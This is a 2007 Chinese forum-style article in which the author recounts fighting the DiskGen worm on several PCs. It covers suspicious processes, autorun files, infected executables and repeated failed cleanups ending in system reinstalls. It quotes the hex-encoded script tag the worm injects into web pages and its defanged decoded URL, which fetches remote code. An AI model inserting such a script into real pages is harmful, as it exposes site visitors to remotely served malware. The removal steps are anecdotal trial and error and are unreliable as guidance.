| 首页 | 文章中心 | 下载中心 | 本站特供 | 软硬件结合论坛 |

您现在的位置： 中国软硬件结合技术网 >> 文章中心 >> 软件技术 >> 计算机与网络 >> 正文

用户登录 新用户注册

[注意]与DiskGen磁碟机病毒的斗争            【字体：小 大】
与DiskGen磁碟机病毒的斗争
作者：keeds    文章来源：本站原创    点击数：    更新时间：2007-12-27
平日里自诩是电脑高手，无论硬件、软件、网络，在周围的小圈子里都可以算是大拿！！无论谁电脑上有什么问题，只要找我就可以妙手回春，药到病除。可今天的遭遇让我惭愧，原来自己还只是个门外汉，顶多算个半吊子。 前天晚上，系里一位老师给我打电话，叫我去给他看看电脑，说是杀毒软件和360安全卫士全不好使了。我按常规先查看进程信息，发现有两个进程可疑，分别是用户名下的LSASS.exe和SMSS.exe，而还有两个system属性的相同进程，名称是小写的，看来那两个大写的进程就是凶手。 360的可执行程序直接被灭掉了，而杀毒软件主程序也无法启动，只有超级兔子幸免于难，用超级兔子进程管理器一看，果然是可疑进程，再一看病毒的路径，都是来自c:/windows/system32/com/文件夹，用兔子进程结束这两个可疑进程，不一会它们又自动出现，看来还得跟它们拼速度，我再一次停止这两个进程，然后立刻用右键粉碎那个文件夹，接着不碰任何文件夹，启动杀软，升级后全盘杀毒，一共杀出来60多个病毒，然后似乎就没什么问题了。 回到寝室，同学的电脑由于优盘带毒也感染了，同样的症状！360被灭，杀软被停。我一看，小事一桩嘛，按照同样的方法，给他整了一遍，结果那个文件夹换了几种粉碎工具都干不掉！每次退出来再看，它又在那里，而那两个进程依旧还会出现，看来病毒已经在别处有分身了。我一问，他电脑在染上病毒后还在使用，我上网搜了一下，这个病毒叫磁碟机（Worm.Diskgen.GEN）病毒：警惕程度★★★☆，蠕虫病毒，通过感染可执行文件传播，依赖系统：WIN9X/NT/2000/XP。 　　该病毒运行后会在系统目录中COM目录（默认为c:\windows\system32\com）下生成名为lsass.exe及smss.exe文件并在各盘符根目录下生成pagefile.pif和autorun.inf，只要双击这些盘符就会启动病毒，还会在“程序－启动”里放一个～.pif的文件,并会生成SMSS.exe和LSASS.exe两个进程。而且该病毒会感染除windows及program files目录下的EXE格式可执行文件（有的说全感染，有的说部分感染），查找硬盘的htm、html、asp、spx、php、jsp网页文件，在结尾处插入一段框架代码（16进制加密）<script src="hxxp://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>解后得：hxxp://js.k0102.com/01.asp。更狠的是感染文件时如果发现Zip和Rar格式的，则用Rar自解压命令释放EXE文件，感染后重新打包放回原处！由于该病毒编写存在一些问题，可能会造成用户安装的软件被损坏，无法使用。360和冰刃均不能打开，用windows优化大师清理流氓软件，当它试图清理pagefile.pif时系统会自动重启。用另一个软件系统进程结束工具syscheck将LSASS.exe结束后，系统在一分钟后会重启。我帮同学整了一晚上，即使是当时终止那两个进程，删了com文件夹，再用最新的杀软全盘杀毒，重启后病毒进程依然存在。而且一进安全模式就蓝屏。忙活到一点多，没办法，先睡吧！ 今天上午，我依旧在热心地帮他想办法，下了冰刃，几种文件粉碎器，均不起作用。就在我用插过他电脑的优盘时，我先用杀软杀了一下，没报毒，然后右键点了打开，结果我的金山弹出对话框说出错要停止运行，我一下子凉了，再一看我的电脑里果然也被感染了。这下我更得努力跟它斗了。我没敢乱动，还是老方法，两个进程暂时停住了。不能重启，否则还会出来，我趁这机会用金山清理专家清理了一下，结果杀出两个隐蔽恶意软件，其中有一个叫broke safeboot什么的，看来就是这家伙阻止进安全模式的。清除了这两个，又用金山全盘杀了一遍，结果我D盘和E盘里的游戏和软件可执行程序以及大量的网页文件被染毒而杀掉，整个硬盘杀掉了865个病毒文件。 重启后进安全模式，顺利进入，看进程，病毒未启动，再看com文件夹还在，启动杀软再扫全盘，其间以为安全模式下没事，手欠，把D盘打开了，杀软立刻又消失，病毒进程再现，com文件夹里的东西依旧顽固。汗，杀软只是杀掉了病毒感染的文件，对病毒本体并不感冒，最多只能杀掉SMSS.exe，而这个进程会很快重现。再重启进安全模式，再杀毒，这下不敢乱动了，结果又杀掉了266个染毒文件。结束病毒进程删了com文件夹后重启，病毒进程没了，可com文件夹还在，只要一打开这个文件夹，杀软必停。这下我郁闷了。反复进安全模式杀毒重启，com文件夹始终顽固，只记得里面有四个文件，无论用什么粉碎工具都整不掉。这期间为保安全，我始终没敢动其他盘。 实在没辙了，只能重做系统了，我跟那同学都重装了系统，从重装到完成大概一个小时吧，装好了，跟另一位同学借了江民的最新安装包，装上后直接杀毒，又杀了一个小时，没杀出毒来。但还是不敢碰其他盘符，突然那同学说那com文件夹还在，我就有点凉了。这时候旁边不知是谁提了一句，你看看没中毒的电脑里有没有这个文件夹。我一看，原来这com文件夹里一直杀不掉的那四个文件原来是系统文件，怪不得呢！然后反复又杀了两遍毒，这才敢装软件上网。现在那个病毒暂时没出现，我又上网查了一下，有人说最好是全格了，否则说不定哪天不小心运行了哪个exe可执行程序，那病毒又会冒出来，看来我得进行一番大清理了。而那个同学因为其他盘里的病毒没杀干净，重装的系统再次中毒。，这病毒真让人崩溃。 瑞星将这个病毒称作Worm.Win32.DiskGen磁碟机，卡巴的定义是Trojan.Win32.Agent.ctd，但瑞星、江民、金山均无法完全消灭这个病毒，卡巴还没试过，网上有说麦咖啡和小红帽能杀，不清楚是不是真的。希望各位朋友们多加注意了。不知道是谁编写的这个病毒 ，真聪明，RP也真差！
文章录入：keeds    责任编辑：Polylove
	上一篇文章： MySQL和SQL Server，到底选择谁？ 下一篇文章： 没有了
【发表评论】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				没有相关文章

网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

| 设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 |
	Copyright ©2004 - 2006 中国软硬件结合技术网 91tech.net 91tech.net.cn 91tech.org 91tech.org.cn 1y11.net 站长：Polylove